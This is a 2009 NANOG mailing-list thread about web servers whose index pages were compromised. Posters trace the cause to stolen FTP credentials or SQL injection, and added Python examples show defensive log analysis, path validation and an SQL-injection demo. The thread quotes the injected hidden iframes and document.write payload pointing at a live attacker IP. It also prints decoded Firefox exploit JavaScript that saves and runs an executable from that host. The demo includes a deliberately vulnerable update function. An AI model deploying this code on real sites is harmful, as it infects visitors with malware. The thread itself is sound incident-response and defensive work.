RE: Malicious code just found on web server
We have seen this twice recently; we have tracked it back to a worm which steals unencrypted FTP information from a desktop. We tracked it down because it occurred on 7 or 8 sites that were on different servers, both Linux and Windows... some had no database associated with them. The only common thing on these sites was they all had the same web developer. She confirmed she was using FileZilla, which does not encrypt the passwords; she also confirmed that she had found a virus/worm on her machine a few weeks before. The same thing was found on other websites that she maintained that we did not host. FTP logs confirmed that a bot was making the changes through FTP. The bot seems to inject a JavaScript and IFrame in all pages that are named index.* - it changed HTML, php and asp extensions.

Chuck Schick
Warp 8, Inc.
(303)-421-5140
www.warp8.com

-----Original Message-----
From: Mike Lewinski [mailto:m...@rockynet.com]
Sent: Monday, April 20, 2009 11:23 AM
To: nanog@nanog.org
Subject: Re: Malicious code just found on web server

Paul Ferguson wrote:

> Most likely SQL injection. At any given time, there are hundreds of
> thousands of legitimate websites out there that are unwittingly harboring
> malicious code.

Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious.

In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced.

Mike
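The FTP-log check Chuck describes, as an added example that is not part of the thread: a Python script that parses xferlog-format transfer records (constructed sample lines below, using documentation-range addresses) and flags a remote host that pushed index.* files into several different FTP accounts within a few minutes. The xferlog field layout, the ten-minute window and the two-account threshold are assumptions of this example.

```python
"""Flag FTP uploads that look like the credential-stealing bot described above.

Added example (not code from the thread). Heuristic: one remote host that
uploads index.* files into several different FTP accounts inside a short
window is far more likely to be a bot working through a stolen credential
list than a developer updating a single site.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import posixpath
import re

# Constructed xferlog-style lines (the wu-ftpd/vsftpd/proftpd transfer log).
# Fields: date(5) xfer-secs host bytes path type flag direction mode user
#         service auth auth-id status. Direction 'i' = upload to the server.
SAMPLE_XFERLOG = """\
Mon Apr 20 10:01:12 2009 1 203.0.113.7 4210 /var/www/acme/index.html a _ i r acme ftp 0 * c
Mon Apr 20 10:01:40 2009 1 203.0.113.7 3880 /var/www/bakery/index.php a _ i r bakery ftp 0 * c
Mon Apr 20 10:02:05 2009 1 203.0.113.7 5120 /var/www/clinic/index.asp a _ i r clinic ftp 0 * c
Mon Apr 20 10:02:30 2009 2 203.0.113.7 9900 /var/www/clinic/about.html a _ o r clinic ftp 0 * c
Mon Apr 20 13:15:02 2009 3 198.51.100.20 17720 /var/www/acme/images/logo.png b _ i r acme ftp 0 * c
Mon Apr 20 13:16:44 2009 1 198.51.100.20 4300 /var/www/acme/index.html a _ i r acme ftp 0 * c
"""

XFERLOG_DATE = "%a %b %d %H:%M:%S %Y"
INDEX_FILE = re.compile(r"^index\.[a-z0-9]+$", re.IGNORECASE)  # index.html, index.php, index.asp ...


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines with too few fields are skipped."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue
        records.append({
            "time": datetime.strptime(" ".join(f[:5]), XFERLOG_DATE),
            "host": f[6],
            "path": f[8],
            "direction": f[11],  # i = upload, o = download, d = delete
            "user": f[13],
        })
    return records


def index_uploads(records):
    """Uploads whose basename is index.* - the files the bot rewrote."""
    return [r for r in records
            if r["direction"] == "i" and INDEX_FILE.match(posixpath.basename(r["path"]))]


def suspicious_hosts(records, window=timedelta(minutes=10), min_accounts=2):
    """Map host -> sorted account names for every host that uploaded index.*
    into at least `min_accounts` distinct FTP accounts within `window`."""
    by_host = defaultdict(list)
    for r in index_uploads(records):
        by_host[r["host"]].append(r)
    hits = {}
    for host, ups in by_host.items():
        ups.sort(key=lambda r: r["time"])
        for i, first in enumerate(ups):
            # all index.* uploads from this host within `window` of `first`
            users = {r["user"] for r in ups[i:] if r["time"] - first["time"] <= window}
            if len(users) >= min_accounts:
                hits[host] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    for host, users in suspicious_hosts(parse_xferlog(SAMPLE_XFERLOG)).items():
        print(f"{host}: rewrote index.* in accounts {', '.join(users)} - look for a shared, stolen credential")
```

The developer's own afternoon upload from 198.51.100.20 touches one account and is not reported; the morning run from 203.0.113.7 across three accounts is. Tune the window and threshold to the hosting environment, and pair the result with a password reset for the affected accounts and a check of the developer's workstation.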
Re: Malicious code just found on web server
Date: Mon, 20 Apr 2009 10:52:57 -0700
From: Paul Ferguson <fergdawgs...@gmail.com>

> On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman <nicknetwo...@gmail.com> wrote:
>
>> On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngsp...@gmail.com> wrote:
>>
>>> But if you figure out how they got write access to a static website, I'd
>>> love to hear it.
>>
>> Compromised FTP credentials would be my guess. They can be obtained by
>> brute force attacks or credential stealing trojans.
>
> Yeah, it could have been any number of ways -- there has also been a huge
> increase of SSH brute-force attacks in the past few weeks:
>
> https://isc.sans.org/diary.html?storyid=6214

And, from several reports (including my own), they (brute force ssh attacks) seem to have stopped at about 22:30 UTC on the 19th. (Not that this is really relevant to the thread.)

--
R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: ober...@es.net    Phone: +1 510 486-8634
Key fingerprint: 059B 2DDF 031C 9BA3 14A4 EADA 927D EBB3 987B 3751
Re: Malicious code just found on web server
On 21/04/2009, at 5:23 AM, Mike Lewinski wrote:

> Paul Ferguson wrote:
>
>> Most likely SQL injection. At any given time, there are hundreds of
>> thousands of legitimate websites out there that are unwittingly harboring
>> malicious code.
>
> Most of the MS-SQL injection attacks we see write malicious javascript into
> the DB itself so all query results include it. However, I'm not sure how
> easy it is to leverage to get system access - we've seen a number of
> compromised customer machines and there didn't appear to be any further
> compromise of them beyond the obvious.
>
> In the OP's case it sounds like static HTML files were altered. My bet is
> that an ftp or ssh account was brute forced.

I have seen a couple of open source web apps (CMSs, etc.) that store names of php files in a database, and those file names are then opened with fopen. SQL injection could be used to write a URL in to the database, and then wait for that entry to be called, and voila, you can execute php code, or whatever.

Obviously that is relevant to the first part of your reply - it would not work with static content.

--
Nathan Ward
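Added example, not code from any CMS mentioned on the thread: a Python resolver for the "file name stored in the database, then opened" pattern Nathan describes. It treats the stored name as untrusted and opens only a regular file inside the template directory, rejecting URLs (what an injected row would hold), absolute paths and directory traversal. The function names, the hypothetical "attacker.example" host and the temporary template tree are this example's own.

```python
"""Confine a database-stored template name to the template directory.

Added example, not code from any CMS mentioned on the thread. The stored
name is treated as untrusted input: an injected row could hold a URL or a
path outside the web root, and fopen()-style code would open it blindly.
"""
import os
import tempfile
from urllib.parse import urlsplit


class UnsafeTemplateName(ValueError):
    """Raised when a stored name is anything other than a file in the template tree."""


def resolve_template(name: str, base_dir: str) -> str:
    """Return the absolute path for `name` inside `base_dir`, or raise."""
    if not name or "\x00" in name:
        raise UnsafeTemplateName("empty or NUL-containing name")
    if urlsplit(name).scheme:  # http://, ftp://, php://, data: ... would become remote inclusion
        raise UnsafeTemplateName(f"URL scheme not allowed: {name!r}")
    if os.path.isabs(name):
        raise UnsafeTemplateName(f"absolute path not allowed: {name!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath() collapses '..' and follows symlinks, so this also catches a
    # symlink inside the template tree that points outside it.
    if os.path.commonpath([base, target]) != base:
        raise UnsafeTemplateName(f"escapes template directory: {name!r}")
    if not os.path.isfile(target):
        raise UnsafeTemplateName(f"not a regular file: {name!r}")
    return target


def is_safe_template(name: str, base_dir: str) -> bool:
    """Boolean form of resolve_template() for callers that only need a verdict."""
    try:
        resolve_template(name, base_dir)
    except UnsafeTemplateName:
        return False
    return True


def render(name: str, base_dir: str) -> str:
    """Open the template the way a CMS would, but only after validation."""
    with open(resolve_template(name, base_dir), encoding="utf-8") as fh:
        return fh.read()


def demo_dir() -> str:
    """Constructed template tree: <tmp>/pages/about.php with a fixed body."""
    d = tempfile.mkdtemp(prefix="tpl_")
    os.makedirs(os.path.join(d, "pages"))
    with open(os.path.join(d, "pages", "about.php"), "w", encoding="utf-8") as fh:
        fh.write("<h1>About</h1>")
    return d


if __name__ == "__main__":
    base = demo_dir()
    for candidate in ["pages/about.php", "http://attacker.example/shell.txt",
                      "../../etc/passwd", "/etc/passwd", "php://input"]:
        print(f"{candidate!r:40} -> {'ok' if is_safe_template(candidate, base) else 'rejected'}")
```

Parameterising the query that reads the name out of the database prevents the row being written in the first place; this check is the second layer, so that a row that does get tampered with cannot turn into remote file inclusion.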
Re: Malicious code just found on web server
Paul,

I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it.

Jake

WHOIS information on the domain

Whois Record
domain:     TEST1.RU
type:       CORPORATE
nserver:    ns1.centerhost.ru.
nserver:    ns1.cetis.ru.
state:      REGISTERED, DELEGATED
org:        Center of Effective Technologies and Systems CETIS
phone:      +7 4957711654
fax-no:     +7 4957879251
e-mail:     http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a
e-mail:     http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff
registrar:  REGRU-REG-RIPN
created:    2001.03.30
paid-till:  2010.04.03
source:     TC-RIPN

Registry Data
Created:      2001-03-30
Expires:      2010-04-03
Whois Server: whois.ripn.net

Server Data
Domain Status: Registered And No Website

On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:

> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>>
>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>>
>> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>
> Not only is that .pdf malicious, when executed it also fetches additional
> malware from:
>
> hxxp:// test1.ru /1.1.1/load.php
>
> If that host is not in your block list, it should be -- known purveyor of
> crimeware.
>
> This is in addition to the other malicious URLs mentioned in this thread.
>
> - ferg
>
> --
> Fergie, a.k.a. Paul Ferguson
>  Engineering Architecture for the Internet
>  fergdawgster(at)gmail.com
>  ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists <jbabbinli...@gmail.com> wrote:

> Paul,
>
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
> domain:     TEST1.RU
> type:       CORPORATE
> nserver:    ns1.centerhost.ru.
> nserver:    ns1.cetis.ru.
> state:      REGISTERED, DELEGATED
> org:        Center of Effective Technologies and Systems CETIS
> phone:      +7 4957711654
> fax-no:     +7 4957879251
> e-mail:     http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a
> e-mail:     http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff
> registrar:  REGRU-REG-RIPN
> created:    2001.03.30
> paid-till:  2010.04.03
> source:     TC-RIPN
>
> Registry Data
> Created:      2001-03-30
> Expires:      2010-04-03
> Whois Server: whois.ripn.net
>
> Server Data
> Domain Status: Registered And No Website
>
> On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:
>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>>
>>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>>
>>> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>
>> Not only is that .pdf malicious, when executed it also fetches additional
>> malware from:
>>
>> hxxp:// test1.ru /1.1.1/load.php
>>
>> If that host is not in your block list, it should be -- known purveyor of
>> crimeware.
>>
>> This is in addition to the other malicious URLs mentioned in this thread.
>>
>> - ferg
>>
>> --
>> Fergie, a.k.a. Paul Ferguson
>>  Engineering Architecture for the Internet
>>  fergdawgster(at)gmail.com
>>  ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <b...@wins.net> wrote:

> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
> </body>
> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site
> references to this. Google search reveals some Chinese sites with
> references to the URL today, but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726

I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company.

We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company.

But if you figure out how they got write access to a static website, I'd love to hear it.

-N.
Re: Malicious code just found on web server
On Mon, Apr 20, 2009 at 9:47 AM, Neil <kngsp...@gmail.com> wrote:

> I've run into this sort of attack before, where they change the page to
> load content from elsewhere; but I couldn't figure out how they managed to
> write to the sites' pages. They were hosted on a commercial webhost, and so
> if it was a compromised host (which seemed like the only possibility to
> me), that didn't speak well for the hosting company.
>
> We were having issues with the company anyways, though; so I took down the
> site, sanitized the pages (and removed a bunch of junk), and put the site
> back up with another company.
>
> But if you figure out how they got write access to a static website, I'd
> love to hear it.

Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code.

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
Paul Ferguson wrote:

> Most likely SQL injection. At any given time, there are hundreds of
> thousands of legitimate websites out there that are unwittingly harboring
> malicious code.

Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious.

In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced.

Mike
Re: Malicious code just found on web server
On Mon, Apr 20, 2009 at 10:23 AM, Mike Lewinski <m...@rockynet.com> wrote:

> Paul Ferguson wrote:
>
>> Most likely SQL injection. At any given time, there are hundreds of
>> thousands of legitimate websites out there that are unwittingly harboring
>> malicious code.
>
> Most of the MS-SQL injection attacks we see write malicious javascript into
> the DB itself so all query results include it. However, I'm not sure how
> easy it is to leverage to get system access - we've seen a number of
> compromised customer machines and there didn't appear to be any further
> compromise of them beyond the obvious.
>
> In the OP's case it sounds like static HTML files were altered. My bet is
> that an ftp or ssh account was brute forced.

Yes -- SQL Injection directly into the HTML. Happening all over the place, hundreds of thousands at a time --- we've been trying to highlight the fact that improper configuration of web services, unescaped configurations, etc., allow SQL injection to insert code (e.g. JavaScript, iFrames, etc.) directly into the HTML or Header.

See also:

http://en.wikipedia.org/wiki/Sql_injection#Real-world_examples

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
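The injection Paul and Mike describe, reduced to a runnable Python/sqlite3 example added here (not code from any poster): an update endpoint that pastes request parameters into SQL text, beside the same endpoint with a typed id and bound parameters, plus the query a defender would run to find rows that already carry injected markup. The table, the "example.invalid" tag and the request values are constructed.

```python
"""Vulnerable vs. parameterised update, modelled on the mass SQL-injection
pattern described above. Added example, not code from any poster: the table,
the 'example.invalid' tag and the request values are all constructed.
"""
import sqlite3

# Placeholder for the markup the real campaigns appended to every text column.
INJECTED_TAG = "<iframe src=http://example.invalid/x.php style=display:none></iframe>"


def make_db() -> sqlite3.Connection:
    """Constructed content table standing in for a CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'Home',  '<p>Welcome</p>');
        INSERT INTO pages VALUES (2, 'About', '<p>About us</p>');
    """)
    return conn


def update_body_vulnerable(conn, page_id: str, body: str) -> int:
    """The bug: request parameters are pasted into the SQL text, so the
    WHERE clause is whatever the caller sends. Returns rows changed."""
    sql = f"UPDATE pages SET body = '{body}' WHERE id = {page_id}"
    return conn.execute(sql).rowcount


def update_body_safe(conn, page_id: str, body: str) -> int:
    """Same operation, hardened: the id must parse as an integer and both
    values are bound as parameters, so they can never become SQL."""
    pid = int(page_id)  # ValueError for anything like '2 OR 1=1'
    return conn.execute("UPDATE pages SET body = ? WHERE id = ?", (body, pid)).rowcount


def rows_with_injected_markup(conn) -> list:
    """Detection side: ids of rows whose body carries a script or iframe tag,
    the symptom Mike describes (every query result includes it)."""
    rows = conn.execute(
        "SELECT id FROM pages WHERE lower(body) LIKE '%<script%' "
        "OR lower(body) LIKE '%<iframe%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


def demo() -> dict:
    """Send the same crafted request to both implementations and report."""
    crafted_id, crafted_body = "2 OR 1=1", INJECTED_TAG
    vuln = make_db()
    changed = update_body_vulnerable(vuln, crafted_id, crafted_body)
    safe = make_db()
    try:
        update_body_safe(safe, crafted_id, crafted_body)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_rows_changed": changed,               # every page rewritten
        "vulnerable_infected_ids": rows_with_injected_markup(vuln),
        "safe_rejected": rejected,                        # bad id never reaches SQL
        "safe_infected_ids": rows_with_injected_markup(safe),
        "safe_legit_rows_changed": update_body_safe(safe, "2", "<p>New about</p>"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:26} {value}")
```

The one-row update becomes a whole-table rewrite only because the id is interpolated as SQL; binding it as a parameter (and refusing anything that is not an integer) is the whole fix. The detection query is what to run against a suspect database before restoring from backup, since the injected markup survives in the rows, not in the files.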
Re: Malicious code just found on web server
On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman <nicknetwo...@gmail.com> wrote:

> On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngsp...@gmail.com> wrote:
>
>> But if you figure out how they got write access to a static website, I'd
>> love to hear it.
>
> Compromised FTP credentials would be my guess. They can be obtained by
> brute force attacks or credential stealing trojans.

Yeah, it could have been any number of ways -- there has also been a huge increase of SSH brute-force attacks in the past few weeks:

https://isc.sans.org/diary.html?storyid=6214

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:

<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
</body>
</html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
b...@wins.net
715-832-3726
RE: Malicious code just found on web server
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

-----Original Message-----
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:

<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
</body>
</html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
b...@wins.net
715-832-3726
Re: Malicious code just found on web server
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):

document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:

<embed src=include/two.pdf width=1 height=0 style=border:none></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <b...@wins.net> wrote:

> FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
>
> -----Original Message-----
> From: Russell Berg
> Sent: Friday, April 17, 2009 3:39 PM
> To: 'nanog@nanog.org'
> Subject: Malicious code just found on web server
>
> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height=0 width=0></iframe>
> </body>
> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site
> references to this. Google search reveals some Chinese sites with
> references to the URL today, but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726
Re: Malicious code just found on web server
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:

> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
>
> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
>
> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>
> That PDF is on the site, I haven't looked at it yet though.

Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:

> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>>
>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>>
>> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>
> Most likely a file that exploits a well-known vulnerability in Adobe
> Reader, which in turn probably loads malware from yet another location.
>
> We've been seeing a lot of this lately.

Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- ferg

--
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:

> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:
>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>>
>>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>>
>>> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - ferg
>
> --
> Fergie, a.k.a. Paul Ferguson
>  Engineering Architecture for the Internet
>  fergdawgster(at)gmail.com
>  ferg's tech blog: http://fergdawg.blogspot.com/
Re: Malicious code just found on web server
Nice, bad code is actually on all of the error (404) pages for the site as well as some other php pages. The code is actually a base64 obfuscation technique to hide the actual attack code. Once decoded, the code attempts multiple attacks to try and get the victim to download an executable:

hxxp://77.92.158.122/webmail/inc/web/load.php

Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3

Also this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular) as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this.)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, Function);
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var file=C.classes['@ mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initWithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@ mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); }")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ io=C.classes['@ mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=io.newURI('http://77.92.158.122/webmail/inc/web/load.php ','UTF8',null);persist=C.classes['@ mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createInstance(C.interfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath this one which was created with a demo copy of Foxit.

hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO: Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code. I can upload or update this thread if you are interested in the other attacks.

Jake

On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securin...@gmail.com> wrote:

> You beat me to it.
>
> -ChrisAM
>
> On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:
>
>> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote:
>>
>>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:
>>>
>>>> I took a quick look at the code... formatted it in a pastebin here:
>>>> http://pastebin.com/m7b50be54
>>>>
>>>> That javascript writes this to the page (URL obscured):
>>>>
>>>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>>>
>>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>>
>>>> Below the javascript, it grabs a PDF:
>>>>
>>>> <embed src=include/two.pdf width=1 height=0 style=border:none></embed>
>>>>
>>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>> Most likely a file that exploits a well-known vulnerability in Adobe
>>> Reader, which in turn probably loads malware from yet another location.
>>>
>>> We've been seeing a lot of this lately.
>>
>> Yes, definitely malicious:
>>
>> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>>
>> - ferg
>>
>> --
>> Fergie, a.k.a. Paul Ferguson
>>  Engineering Architecture for the Internet
>>  fergdawgster(at)gmail.com
>>  ferg's tech blog: http://fergdawg.blogspot.com/
